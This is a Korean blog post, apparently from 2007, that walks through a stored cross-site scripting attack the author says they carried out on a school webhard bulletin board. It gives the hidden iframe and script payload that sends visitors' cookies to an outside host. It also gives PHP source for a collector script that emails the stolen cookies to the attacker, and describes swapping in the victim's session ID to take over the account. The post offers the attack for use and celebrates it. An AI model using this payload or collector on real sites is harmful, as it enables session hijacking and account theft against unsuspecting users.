반응형
흔히 XSS 공격을 할때 가장 중요한건 상대방의 session_id가 소멸 되기 전에 자신의
session_id를 상대방 걸로 바꿔 치는건데, 계속 메일창만 드려다 볼수는 없는 노릇임으로,
적절한 작전이 필요한데, 최상의 방법은 바로 MSN 메일을 쓰는 것이다.
MSN 메신져를 켜둔 상태에서 MSN 메일에 새로운 메일이 도착하면 알려주는 서비스를 이용해
우리는 신속하게 session_id를 사용할 수 있게 된다.
실제로 학교 웹하드 게시판에 이렇게 글을 적어 두었다.
제목 : 우와 진짜 끝내 주네요!
내용 : 이젠 웹링크도 지원되고 정말 좋은거 같습니다!!
<iframe name="i" width="0" height="0"style="filter:Alpha(Opacity=65);"></iframe>
<script>i.location="http://rvc.muz.ro/1.php?c="+document.cookie</script>
<script>i.location="http://rvc.muz.ro/1.php?c="+document.cookie</script>
스크립트가 들어갔지만 실제로 화면으론 다음과 같이 보임:
-----------------------------------------------------
-----------------------------------------------------
메일을 보내주는 1.php 의 소스
<?php
extract($_GET); //POST와 GET수용
extract($_POST);
$d = microtime(); //현재 시간을 구한다.
$data = "$c\n"; //넘어온 쿠키값을 data에 재저장
mail("자기아이디@hotmail.com","쿠키수집",
$data,$d); //내 메일로 전송
$c = 0; //변수들을 비운다.
$data = 0;
$d = 0;
?>
-----------------------------------------------------
사용자가 저 글을 읽었을때 내 MSN에선 바로 반응이 옴.
메일을 열어보면..? :p
아름 다운 session_id가 적혀 있고,
내 session_id를 살포시 저것으로 바꿔주면~
Game Set.
'Security' 카테고리의 다른 글
JSP 웹해킹 (1) | 2007.03.31 |
---|---|
JSP 기반의 Web hacking 방법 (2) | 2007.03.31 |
Down it (0) | 2007.03.31 |
Netcat 을 이용한 웹해킹 (0) | 2007.03.28 |
SQL Injection Code 정리 (0) | 2007.03.24 |